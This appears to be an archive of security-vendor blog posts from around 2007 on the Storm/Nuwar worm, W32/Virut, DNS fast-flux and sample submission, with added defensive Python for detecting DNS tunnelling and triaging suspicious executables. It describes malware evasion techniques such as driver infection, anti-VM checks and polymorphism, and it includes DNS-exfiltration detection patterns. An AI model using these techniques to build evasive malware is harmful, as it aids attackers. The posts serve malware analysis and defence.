1. Policy Auditing – when you know what’s on your network you can see what shouldn’t be there. An Xbox 360 client string or a stray telnet server showing up on the corporate network points straight at a problem.
2. Patch Management – inventorying IT is a nightmare. I’ve never seen an organization that didn’t have a box (or VM) it couldn’t find. With PHC, if the box talks on the network (i.e. if it is a risk) then you can find it and know about it.
3. Penetration Testing – if you have PHC information available for a pen test, the game is almost over before it starts. Passive OS identification can be fooled and client/server strings can be altered, but they usually aren’t, and combined they give a very good picture of what the network looks like. Banner grabbing is a first step in a pen test; having all of it handed to you lets you pick the right targets and make very little noise. Caution though: this is a double-edged sword. Good guys and bad guys alike can use this information.
4. Data Exfiltration Detection – one of the more elegant exfiltration techniques is misusing DNS. PHC can characterize typical DNS traffic (by volume, message size, whatever you choose), so frequent large DNS messages from one host stand out. This isn’t a theoretical attack; there are products that tunnel data over DNS.

I’ve seen the four examples above used very effectively at very large organizations. But again, the uses aren’t limited to those. I’ve conjectured about tracking down the Storm botnet. I’m NOT a Storm expert, but it appears that Storm uses so-called “fast-flux” techniques: it uses rapid DNS changes and proxies to keep moving where a name’s A records point, so the proxy layer keeps a stable domain name while hopping from IP to IP. PHC, as mentioned above, can characterize DNS traffic. Simply write a rule that flags names whose A records keep changing, or DNS replies with extremely short TTL values. Very quickly, you’ll likely start to see hosts that are in a fast-flux botnet…. From there, maybe you can characterize those hosts?
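The two DNS rules sketched above (point 4’s “frequent large DNS messages” and the fast-flux rule in the last paragraph) and the short-TTL / many-addresses pattern seen in the single-flux dig output earlier in this archive can all be written against the same passively collected data. The following Python is an added example; it is not code from TRICKLER, PVS or any McAfee tool. The DNS responses and queries it works on are constructed inline (documentation-range addresses, made-up names), and every threshold is an assumption to be tuned against a baseline of the site’s own traffic.

```python
"""Passive DNS characterisation rules: fast-flux names and DNS-tunnelling clients.

Added example for this post; not code from TRICKLER, PVS or any McAfee tool.
Input is a constructed list of passively observed DNS responses and queries, as a
PHC sensor might back-haul them. All thresholds below are assumptions to tune per site.
"""
from collections import defaultdict
from statistics import mean

# Constructed responses: (seconds, client, qname, ttl, A records). Addresses are
# from the documentation/benchmark ranges, not real observations.
RESPONSES = [
    # CDN-style name: short TTL, but every answer comes from the same /16.
    (0,   "10.0.0.5", "cdn.example.net", 20, ["198.51.100.10", "198.51.100.11"]),
    (60,  "10.0.0.5", "cdn.example.net", 20, ["198.51.100.12", "198.51.100.10"]),
    (120, "10.0.0.7", "cdn.example.net", 20, ["198.51.100.11", "198.51.100.13"]),
    # Flux-style name: short TTL and answers scattered across unrelated networks.
    (0,   "10.0.0.9", "casino.example.com", 180, ["203.0.113.4", "192.0.2.77", "198.18.3.9"]),
    (200, "10.0.0.9", "casino.example.com", 180, ["192.0.2.150", "198.19.40.2", "203.0.113.88"]),
    (400, "10.0.0.9", "casino.example.com", 180, ["198.18.250.1", "203.0.113.4", "192.0.2.9"]),
    # Ordinary name: long TTL, one stable address.
    (0,    "10.0.0.5", "www.example.org", 86400, ["192.0.2.1"]),
    (5000, "10.0.0.5", "www.example.org", 86400, ["192.0.2.1"]),
]

# Constructed queries: (client, qname). One client is pushing data out in labels.
QUERIES = [("10.0.0.5", "www.example.org"), ("10.0.0.5", "mail.example.org"),
           ("10.0.0.7", "cdn.example.net"), ("10.0.0.9", "casino.example.com")]
QUERIES += [("10.0.0.42", f"{i:08x}{'4a6f'*6}.t.exfil-example.net") for i in range(30)]


def slash16(ip):
    """Coarse network key (first two octets), a cheap stand-in for an ASN lookup."""
    return ".".join(ip.split(".")[:2])


def profile_names(responses):
    """Per-name summary: TTLs seen, distinct addresses, distinct networks."""
    prof = defaultdict(lambda: {"ttls": [], "ips": set(), "nets": set()})
    for _t, _client, qname, ttl, ips in responses:
        p = prof[qname]
        p["ttls"].append(ttl)
        p["ips"].update(ips)
        p["nets"].update(slash16(ip) for ip in ips)
    return prof


def flux_candidates(responses, max_ttl=300, min_ips=5, min_nets=3):
    """Names answered with short TTLs AND many addresses spread over several networks.

    Short TTL alone is a poor indicator: CDNs and load balancers use it too, which is
    why the CDN name above is not flagged. Flux stands out because the relays are
    compromised hosts in unrelated networks.
    """
    flagged = {}
    for qname, p in profile_names(responses).items():
        if max(p["ttls"]) <= max_ttl and len(p["ips"]) >= min_ips and len(p["nets"]) >= min_nets:
            flagged[qname] = {"ttl": max(p["ttls"]), "ips": len(p["ips"]), "nets": len(p["nets"])}
    return flagged


def parent_zone(qname, labels=2):
    """Last `labels` labels of a name; crude stand-in for a public-suffix-aware split."""
    return ".".join(qname.rstrip(".").split(".")[-labels:])


def tunnel_suspects(queries, min_unique=20, min_mean_len=40):
    """Clients sending many distinct, long names under one zone: data carried in labels.

    Volume and size are the characterisation the post describes; a baseline of the
    site's normal per-client numbers should set the thresholds.
    """
    names = defaultdict(set)
    for client, qname in queries:
        names[(client, parent_zone(qname))].add(qname)
    return {key: len(qs) for key, qs in names.items()
            if len(qs) >= min_unique and mean(len(q) for q in qs) >= min_mean_len}


if __name__ == "__main__":
    for qname, info in flux_candidates(RESPONSES).items():
        print(f"fast-flux candidate {qname}: {info}")
    for (client, zone), n in tunnel_suspects(QUERIES).items():
        print(f"possible DNS tunnel: {client} -> {zone} ({n} distinct names)")
```

Run stand-alone it reports the casino name as a flux candidate and the 10.0.0.42 client as a tunnelling suspect, while the short-TTL CDN name passes. The point of the /16 key is the caveat a practitioner hits immediately: TTL alone flags every CDN on the Internet, so the rule needs a measure of how unrelated the answering networks are (an ASN lookup is the production version of this). Likewise the tunnel rule will fire on legitimate software that encodes lookups in DNS labels, which is why it should be fed a per-site baseline rather than the hard-coded numbers used here.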

    Day in the life of a researcher

    Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

    It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

    Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

    Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea - aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

    So how does someone wishing to submit something for analysis go about doing it?

    For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit trickier. There’s a continuum of sneakiness, from very spammy-looking emails with attachments to bots that get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.

    If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files, so check for duplicates. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation.) If you’re not sure how to create a hash, there are programs that can help. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu), which lets you group by CRC and get rid of any duplicates.

    In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

    Nuwar: new file names

We all know that the Nuwar (aka Storm) gang has been continuously changing its spam text, download sites, executables, network traffic patterns and so on throughout this year in its efforts to slip through the security defenses at various layers. I had a chance to briefly look at a ‘fresh’ Nuwar sample this weekend. Interestingly, they have now also changed the names of the files Nuwar drops: it now drops noskrnl.exe, noskrnl.sys and noskrnl.config instead of Spooldr.exe, Spooldr.sys and Spooldr.ini respectively. It also tried to propagate actively by copying itself to the floppy drive, which is new.

This is not the first time the dropped file names have changed (earlier this year it was wincom), but they had been stable for the past few months. Users, especially those who rely on system diagnostic tools, should take care to distinguish noskrnl from the legitimate ntoskrnl.exe. Perhaps spooldr had become too well known for the author’s comfort: a search for spooldr clearly shows what it is, while for the time being a search for noskrnl does not. In any case, we detect these as Tibs-Packed.

    Malware Service Providers

    There have been quite a number of fascinating articles lately pertaining to the people behind the scenes in the world of malware: the folks who offer malware-related services.

    First we have the Washington Post article from a few days ago, discussing the Russian Business Network, which is thought to be hosting a significant number of sites involved in distributing malware, phishing, child pornography, and other undesirable things. The RBN responded to these allegations in an interview with Wired magazine, saying that they’re innocent of these charges.

CIO magazine has also posted a three-part article about researchers’ experiences tracking and infiltrating a group that is renting out password-stealing botnets. Again that name comes up: the Russian Business Network.
    Part 1, Part 2, Part 3

    The amount of cooperation in these circles astounds me. Forget Kevin Bacon; it’s like the Six Degrees of Bot Masters out there!

    There’s a small point that’s made on page 1 of Part 3 of the CIO article that I think bears further examination: In the very near future, customers will be forced to deal with more of the consequences if their machines are found to be insecure. It could be banks lowering fraud limits or making infected customers prove that they were sufficiently protected against malware.  It could be ISPs limiting infected machines to walled gardens. I’m sure this trend will continue, as service providers get tired of eating the cost of malware-related damages.

There are those who say that this tactic is punishing victims, and to a certain extent I agree with this assessment. On the other hand, each of us is a victim in this situation, and each one of us is being punished regardless of whether our machine is ever infected. The money that banks and ISPs are paying to deal with cybercrime has to come from somewhere. That money comes from higher ISP rates or bank fees. It’s my hope that the problem gets sorted out like a use tax, or car insurance rates. Those who keep their machines clean can have the best rate, while those who get infected see their rates rise until they have kept their systems clean for some time.

    Hopefully there can be a way to make people aware of the cost of identity theft without leaving them in the poorhouse, one that helps them appreciate the importance of protecting their machines.

    Nuwar starts ‘Krackin’

    The latest trick Nuwar (aka Storm) plays looks like this:

    Screenshot of Webserver

Like previous variants, the HTML page contains a script that attempts to execute the malicious file hosted on the webserver. However, even if the exploit code is blocked by AV software or never runs because of the browser’s security settings, the user can still click the download button and infect the machine.

    McAfee VSE8 Alert

    Make sure you’re protected so you do not join the Storm network!

    W32/Virut: Evolution gone wrong

    In this age of botnets, rootkits, spyware and other bleeding edge security threats, file infectors are frequently thought of as a dead threat. But over the past year or so, we have seen a resurgence in classic file infecting viruses. Parasitic threats such as W32/Bacalid, W32/Detnat and W32/Polip have enjoyed a relatively high degree of success in the wild causing widespread damage to computer systems.

    An upcoming new kid on the block is W32/Virut - a polymorphic entry-point obscuring virus with IRC bot functionality. Once a machine is infected, it hooks the following APIs (ZwCreateFile, ZwCreateProcess, ZwCreateProcessEx, ZwOpenFile) in ntdll.dll for all running processes, in an attempt to infect .EXE and .SCR files. It then “phones home” to a remote IRC command and control server where it can be instructed to download other malware or be used to perform DDoS attacks.

    W32/Virut comes with its share of buggy code and as a result it may misinfect or reinfect a significant proportion of executable files leaving them permanently corrupted beyond repair. Some variants make the trivial mistake of not checking PE section boundaries while infecting and this causes infected executables to crash when run. Also, the virus sometimes hijacks its own function calls which leads to an infinite loop. No one ever said viruses had the best programming ;-)

The creator of W32/Virut appears to have a fancy for the works of Friedrich Nietzsche, a nineteenth-century German philosopher. Embedded in the virus body is an excerpt from a poem by Nietzsche:

    O noon of life! O time to celebrate!
    O summer garden!
    Relentlessly happy and expectant, standing: -
    Watching all day and night, for friends I wait:
    Where are you, friends? Come! It is time! It’s late!

    Virus code is usually known to contain personal taunts directed towards the antivirus community or flames against rival malware authors. But quoting Friedrich Nietzsche - that’s deep! (Credits to Naveen Gooty for analysis but Dave Marcus still doubts the translation used in the virus code!!).

    Bad month for malware authors

    They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

    In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

    On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don’t mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and three men who were recently fined by the FTC for surreptitiously distributing adware, will apparently be keeping $3.2 million in profits from their underhanded activities.

    While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

    Nuwar: Are You Game?

After luring unsuspecting users into its trap with Labor Day postcards and NFL kickoffs, Nuwar (a.k.a. Storm Worm) has now switched to “free games” bait:

[two sample spam e-mails shown in the original post]

If you’re gullible enough to follow that link, it will take you to a convincing-looking Web page loaded with game images and an unpleasant surprise: a cocktail of exploits and downloaders:

    So if you’re not running an on-access anti-virus product, you’re already in trouble. Anyway, the page itself looks like this (complete with broken images):

    It promises “1000+ free games,” but whatever icon you click you get nothing but Nuwar in a file named ArcadeWorld.exe.

    Stuck between a rock and a virtual place?

    There are two trends which seem to be heading for an inevitable conflict.

    • increasing use of virtualization in the market place
    • increasing detection of debuggers and virtual environments by malcode

Virtualization, while once relatively small, is expanding in the market, driven by cost cutting, affordability, and disaster recovery, to name just a few.  Large players (VMware, IBM, Microsoft, and others) are offering competing platforms to serve the customer need.  Public information and general interest lead one to believe in a moderate rate of adoption.

On the other hand, malware is often wrapped in protectors that include anti-VM checks (e.g. Themida), or carries its own code to detect a virtual environment (e.g. Nuwar) and then exits.  This has been generally increasing, in an attempt to irritate security researchers, who find virtual machines a convenient way to analyse malware quickly.

VM technologies present their own security hurdles for the future, but in the short term these trends probably make virtual machines more secure (at least from a malware perspective) than physical ones.  Eventually they will force malware authors to make a decision: keep writing code that makes analysis harder for researchers, or expand platform support to virtual environments.

    Nuwar/Zhelatin/Storm took a nap

While monitoring the Nuwar/Zhelatin/Storm network, I noticed the bot stopped sending out emails on Thursday at 9.45pm UTC.

    No more postcards? No more Pump&Dump spam? Or just a bug in my setup?

This morning at 7.00am UTC, still not a single mail. But I saw the bot connecting to the peer-to-peer network and transferring data, the same way it had done for the last several days.

    I gave MessageLabs a call and they confirmed that the number of intercepted emails containing Nuwar related links had diminished considerably in the past few hours.

So it’s not my goat setup behaving differently than expected.

    Time to party? Unfortunately not - at 10.45am UTC, my system sent me an alert. New mails got captured. Well, at least it took a nap for 13 hours.

    Watch out for mails offering videos from either:

    Snoop Dog, Beyonce, Hurricane Chris, Emenem, Lil Mama, Heuy, Chris Brown, Eagles, T-Pain, Fergie, R. Kelly, Sean Kingston, Kelly Clarkson, Velvet Revolver, Fat Boy, Akon, Rihanna, Foo Fighters.

    For example:

    Zhelatin example


    Nuwar moonlights as a blogger

It used to be one of our many mantras, back in the old days, that virus writers do not have QA departments. That is to say, virus infections can have very odd, unintended consequences.

    How many of you out there remember the Bugbear virus from 2002? It had a very odd side effect that it would send its attachments to network printers, causing them to spew tons of pages of apparent gibberish, as it printed out the contents of its executable attachment.

    Nuwar is having a similarly strange effect lately, effectively posting itself to blogs, where people have set their blogs to be updated by email. Kind of a bonus spreading mechanism there, as this doesn’t seem to have been intentional.

    At this point the social engineering doesn’t translate real well, as it’s really geared towards the email format. It should stick out pretty distinctly on a person’s blog. Of course the usual advice applies… don’t go clicking on strange links. kthx!!!

    Oh boy, more Nuwar tricks!

    Hot off the presses - here’s a copy of a new Nuwar email I just got in my inbox:

    Welcome Member,

    We are glad you joined Downloader Heaven.

    User Number: 3692766664
    Your Temp. Login ID: user3709
    Your Password ID: oh662

    Please keep your account secure by logging in and changing your login info.

    Click here to enter our secure server: http://555.112.63.49/

    Welcome,
    Membership Support Department
    Downloader Heaven

    Now, you’ll note this isn’t a valid IP address.  It seems they’ve officially given up on the e-card thing, and are playing around to see what sort of techniques work better.  I’d guess the “sexy” emails didn’t work so well, as many corporate email filters would have tagged messages with that sort of content.

    Nuwar turns “sexy”

Apparently the ecard scam doesn’t work that well any more for Nuwar. Or maybe the virus author read Allysa’s post and decided to abandon the ecard plot before it’s too late. Anyway, Nuwar spam has now resorted to the eternal sex theme, the favourite among spammers. The latest Nuwar e-mails have an empty Subject: and content like this:

    Lonely? Me too. Look what I like to do when I get lonely.
    http://555.37.138.40/

    or

    I never thought I would ever take these kind of pics, but it makes me so wet. take a look, hehe.
    http://555.30.9.127/

    or… Well, you get the idea. Basic instinct galore!

    P.S. I shamelessly copycatted Hollywood - there are no IP addresses beginning with, or indeed containing, 555.

    Beginning of the end of legitimate eCards?

Unless you’ve been living in a cave without email access for the last year, you’ve probably gotten at least one (if not hundreds!) of the emails currently being pumped out by W32/Nuwar@MM, aka the Storm Worm.  The spam email templates have been getting updated on at least a daily basis lately, which makes this a moving target.  They’re all worded as variations on a theme of “somebody you know sent you an eCard greeting”, and include a link to a website containing code that downloads a malicious executable.  The name of this executable has been changing regularly, though not nearly as quickly as the texts of the emails.  For the last several weeks it was “ecard.exe”, and in the last couple of days it’s switched to “msdataaccess.exe”. (Thanks to Dmitry’s efforts, we’re able to keep up with this quite quickly.)

    Where this gets really interesting for me is how this is beginning to affect user behavior:
    We’re starting to get samples from people who suspect they’re getting malicious Nuwar emails, which are in fact just plain old-fashioned eCard greeting notifications.

    The thing is, they really are right to be suspicious.  Sending eCard greeting notification messages with links in the body ceased to be a good idea several years ago, when the technique of sending emails with links to malicious files started to be regularly used by malware to spread itself.  With Nuwar shifting around their emails so often to evade detection, it’s inevitable that the malicious emails will use wording which is similar to that used by major, legitimate eCard greetings providers.

    It behooves the legitimate greeting card companies to come up with a sensible way around this, before it affects their bottom lines.  They’ll need to find a way to get notifications to users that is at once convenient, and not such a huge target for use as a social engineering tactic by malware writers.  Do I know what that would be, at this point?  No, it really is a tricky problem.  And it’s one that’s bound to be faced by other vendors as well (sites which send e-vites, for instance) in the near future.

    Keeping up with Nuwar

A few weeks ago I noticed a relative spike in the “You’ve received a postcard from …” spam. Not that I hadn’t received it occasionally before, but now it was coming in noticeable numbers, hitting my mailbox several times an hour. My family told me they were receiving it too. It was, of course, a new wave of Nuwar (aka Zhelatin, aka Peacomm, aka “Storm worm”) spamming. So I got curious and downloaded several samples from the spammed links. Not using IE or any other browser for that matter - that would be asking for trouble - but using a utility of my own, somewhat similar to wget but developed independently a long time ago. I scanned the samples with our latest beta DATs and found that we missed some. Well, given that Nuwar is polymorphically repacked every few minutes and a functionally new version is released every day, that was hardly surprising. I zipped the samples up and sent them to our virus researchers to produce detection for them.

And it continued like that for the next two or three days: periodically I would check my mailbox for Nuwar spam, download the samples, scan them and forward whatever we did not detect to our virus analysts. And then I decided to automate the whole process. Firstly, because after a couple of days I got bored with doing it manually. And secondly, and more importantly, because manual processing was not good enough for keeping up with something changing as quickly as Nuwar. I needed a system that would poll given POP3 mailboxes every few minutes, recognize new Nuwar e-mails, extract the URLs and the compromised computers’ IPs from them, and submit those URLs to a URL monitoring subsystem. The URL monitoring subsystem would attempt to download samples from the URLs every so many minutes, exclude duplicates by calculating, storing and comparing MD5 hashes, periodically (say, once an hour) scan the downloaded samples with our latest DATs, collect whatever is not detected and e-mail it to human and automatic analysts for further processing. A separate subsystem would keep the local copy of our scanner updated from beta DATs. On top of that, being preoccupied with my other projects, I could spend only an hour or two on this new project.

Fortunately, I already had all the necessary components, developed a long time ago for my other projects, and all I had to do now was put them together with something like a bunch of BAT files. The wget-like geturl utility I mentioned supports not only HTTP and FTP but a number of other protocols, in particular POP3 - so that’s what I used for polling the POP3 mailboxes. The scanner updating subsystem is part of my VGrep and MiniMavis projects (MiniMavis is a multi-scanner system predating VirusTotal and the like by years. Not open to the public, though). I also developed a URL monitoring engine a few years ago for an internal Avert project. And I have my own hashfile utility, capable of calculating a number of hashes over given files, including MD5, and my own mailit utility to send e-mails with attachments. The rest was a matter of Windows batch scripting - rather useful, and its FOR statement in particular is powerful enough - and utilities like find and wzzip.

    As a result, new Nuwar variants are now spotted and collected pretty much as soon as they appear and if we do not detect them on the spot, we detect them an hour or two later ;)
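Two posts in this archive describe the same two chores: pulling the download URLs (and relay IPs) out of captured Nuwar spam, and keeping exactly one copy of each distinct payload so that analysts get a representative set rather than hundreds of identical files (the “one of each unique hash, up to about 10” guidance from the sample-submission post). The following Python is an added example and is not the author’s geturl/hashfile/BAT pipeline or any McAfee tool. The mail bodies are made up in the style the posts describe, and the download step is replaced by a constructed URL-to-bytes table so the script runs offline.

```python
"""Collect URLs from captured spam and keep one copy of each distinct payload.

Added example for these posts; not the author's geturl/hashfile/BAT pipeline and not a
McAfee tool. The download step is replaced by a constructed URL -> bytes table so the
script runs offline; the mail bodies are made up in the style the post describes.
"""
import hashlib
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed spam bodies (not real captures). Two point at the same relay host.
MAILS = [
    "You've received a postcard from a family member! http://192.0.2.44/?a1b2c3",
    "Greeting card waiting for you: http://198.51.100.9/ecard.exe",
    "You've received a postcard from a neighbor! http://192.0.2.44/?d4e5f6",
]

# Constructed payloads standing in for fetched files. Two URLs serve identical bytes,
# as happens when a relay hands out the same build repeatedly.
FETCHED = {
    "http://192.0.2.44/?a1b2c3": b"MZ\x90\x00" + b"A" * 64,
    "http://198.51.100.9/ecard.exe": b"MZ\x90\x00" + b"B" * 64,
    "http://192.0.2.44/?d4e5f6": b"MZ\x90\x00" + b"A" * 64,
}


def extract_urls(bodies):
    """Map each URL found in the mail bodies to its host (the relay to record/block)."""
    found = {}
    for body in bodies:
        for url in URL_RE.findall(body):
            url = url.rstrip(".,)")          # strip trailing punctuation from prose
            found[url] = urlsplit(url).hostname
    return found


def digest(data):
    """SHA-256 of the bytes. MD5, as in the post, still deduplicates identical files,
    but SHA-256 is what you want when the hash is also shared with others."""
    return hashlib.sha256(data).hexdigest()


def dedupe(payloads, seen_hashes=(), limit=10):
    """One representative URL per distinct payload, skipping hashes already known.

    `limit` mirrors the 'up to about 10' guidance for submissions: a polymorphic or
    parasitic family is well represented by ten distinct instances.
    Returns (new: {hash: url}, duplicates: [url]).
    """
    seen = set(seen_hashes)
    new, duplicates = {}, []
    for url, data in payloads.items():
        h = digest(data)
        if h in seen:
            duplicates.append(url)
            continue
        seen.add(h)
        if len(new) < limit:
            new[h] = url
    return new, duplicates


if __name__ == "__main__":
    urls = extract_urls(MAILS)
    print("relay hosts:", sorted(set(urls.values())))
    new, dups = dedupe(FETCHED)
    print(f"{len(new)} new sample(s) to submit, {len(dups)} duplicate(s) dropped")
    for h, url in new.items():
        print(f"  {h[:16]}...  {url}")
```

In the real pipeline the `FETCHED` table is filled by a fetcher that is not a browser (as the post stresses), and `seen_hashes` is the store of everything already scanned, so only genuinely new builds reach the analysts. Note that hash deduplication only collapses byte-identical files; a server-side repacked sample differs in every byte and will always look new, which is exactly why the post ends up scanning what is collected rather than relying on the hash alone.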

    New wave of nuwars storming in

The W32/Nuwar (aka Storm worm) authors have been active again recently. It is speculated to be one of the largest botnets and has the potential to launch a mammoth DDoS attack. The huge rise in bot numbers lately has been attributed to the social engineering tactics of the recent eCard spam mails. This threat is also believed to be behind the recent spam runs of RAR-compressed text files.

    This notorious group is not only focusing on ‘improving the effectiveness’ of their spam but are also trying hard to evade detection of the malignant eCard executables by using some of the techniques as mentioned below.

There is a re-emerging trend among malware to parasitically infect executables that are already referenced from the startup registry keys, inserting loader code for the malicious binary instead of using the traditional technique of adding a startup registry entry. This can help bypass tools that system administrators use to inspect the registry for suspicious executables. Recent variants of Nuwar parasitically infect tcpip.sys to insert the loader code for their malicious device driver. Specifically targeting and infecting a Windows device driver file (tcpip.sys in this case) is a pretty interesting technique. The following image shows the malicious code inserted at the end of the infected tcpip.sys, whose entry point is modified to point to it.
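This is the same artefact the W32/Virut post describes from the other side: a host file whose entry point has been pointed at code appended to its last section, and (in Virut’s buggy case) a section table that no longer matches the file. The following Python is an added example, not McAfee code and not derived from a real sample: it constructs a clean and an “infected” PE32 image in memory and applies the header checks a triage script would run before trusting a driver or executable. The section layout, characteristics and the choice of heuristics are assumptions; for a system file such as tcpip.sys the first check in practice is the hash and Authenticode signature against a known-good copy, and these heuristics also fire on legitimately packed binaries, so they point at what to look at rather than deliver a verdict.

```python
"""Flag a PE whose entry point was redirected into appended code, or whose section
table no longer matches the file.

Added example for the Virut and Nuwar/tcpip.sys posts; not McAfee code and not a
real sample. Two minimal PE32 images are constructed in memory: a clean one and one
'infected' the way both posts describe (code appended to the last section, entry
point pointed at it). Only the headers matter here; the section bodies are filler.
"""
import struct

SCN_CODE, SCN_INIT_DATA = 0x00000020, 0x00000040
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
OPT_SIZE, E_LFANEW, FILE_ALIGN = 0xE0, 0x80, 0x200   # PE32 optional header size


def _align(n, a):
    return -(-n // a) * a


def build_pe(sections, entry_point):
    """Assemble a PE32 from (name, virtual_address, virtual_size, characteristics, raw) tuples."""
    size_of_headers = _align(E_LFANEW + 24 + OPT_SIZE + 40 * len(sections), FILE_ALIGN)
    dos = bytearray(E_LFANEW)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, E_LFANEW)                       # e_lfanew
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, len(sections), 0, 0, 0, OPT_SIZE, 0x0102)
    opt = bytearray(OPT_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 16, entry_point)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                         # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)              # Section/FileAlignment
    struct.pack_into("<I", opt, 60, size_of_headers)                  # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    headers, body, raw_ptr = b"", b"", size_of_headers
    for name, va, vsize, chars, raw in sections:
        rsize = _align(len(raw), FILE_ALIGN)
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va, rsize, raw_ptr, 0, 0, 0, 0, chars)
        body += raw.ljust(rsize, b"\0")
        raw_ptr += rsize
    return (bytes(dos) + coff + bytes(opt) + headers).ljust(size_of_headers, b"\0") + body


def parse(data):
    """Entry point RVA and section table (layout shared by PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    ep = struct.unpack_from("<I", data, e_lfanew + 24 + 16)[0]
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rsize": rsize, "rptr": rptr, "chars": chars})
    return ep, sections


def entry_point_findings(data):
    """Human-readable findings; an empty list means nothing suspicious was seen."""
    ep, sections = parse(data)
    findings = [f"{s['name']}: raw data runs past end of file" for s in sections
                if s["rptr"] + s["rsize"] > len(data)]        # the misinfection/crash case
    home = [s for s in sections if s["va"] <= ep < s["va"] + max(s["vsize"], s["rsize"])]
    if not home:
        return findings + ["entry point outside every section"]
    s = home[0]
    if len(sections) > 1 and s is sections[-1]:
        findings.append(f"entry point in last section {s['name']}")
    if s["chars"] & SCN_WRITE and s["chars"] & SCN_EXEC:
        findings.append(f"entry section {s['name']} is writable and executable")
    if not s["chars"] & SCN_CODE:
        findings.append(f"entry section {s['name']} is not marked as code")
    return findings


TEXT = (b".text", 0x1000, 0x100, SCN_CODE | SCN_EXEC | SCN_READ, b"\xC3" * 0x100)
CLEAN = build_pe([TEXT, (b".data", 0x2000, 0x100, SCN_INIT_DATA | SCN_READ | SCN_WRITE, b"\0" * 0x100)], 0x1000)
# Loader code appended after the original data, section grown and made executable,
# entry point moved onto the appended bytes: the pattern both posts describe.
INFECTED = build_pe([TEXT, (b".data", 0x2000, 0x300, SCN_INIT_DATA | SCN_READ | SCN_WRITE | SCN_EXEC,
                            b"\0" * 0x200 + b"\x90" * 0x100)], 0x2200)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("infected", INFECTED), ("truncated", INFECTED[:-0x100])):
        print(f"{label}: {entry_point_findings(image) or ['no findings']}")
```

The “truncated” case models the Virut bug: a section header that promises more raw data than the file holds, which is what makes a misinfected executable crash when the loader maps it. Pointing `parse` and `entry_point_findings` at the bytes of a real file (`open(path, "rb").read()`) works unchanged; only the two constructed images are specific to this example.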

Nuwar variants have also been using server-side polymorphism to evade detection: the code of the top-level decryptor of the executable hosted on the server keeps changing while preserving the overall semantics. A cocktail of the following anti-emulation techniques is also frequently introduced, and the code for these is constantly morphed as well:

- Use of various MMX instructions
- Fake API calls: most Nuwar variants make fake Windows API calls such as CreateMDIWindowA, ILGetSize etc. This is not dead code. The calls are fake in that they are not made for the purpose those APIs exist for; instead, null or junk parameters are passed and the returned error codes are validated during decryption.
- Verifying the value at the end of the Structured Exception Handling chain.

    We are keeping our eyes open!

    BlackHat and DefCon Presentations are live

    McAfee Avert Labs had several presentations this year. One each at BlackHat and DefCon.

John Viega and David Coffey presented on Building an Effective Application Security Practice on a Shoestring Budget at BlackHat. I heard quite a bit of positive feedback on this at the conference itself. Kudos and extra points to both John and Dave for working in beer references!

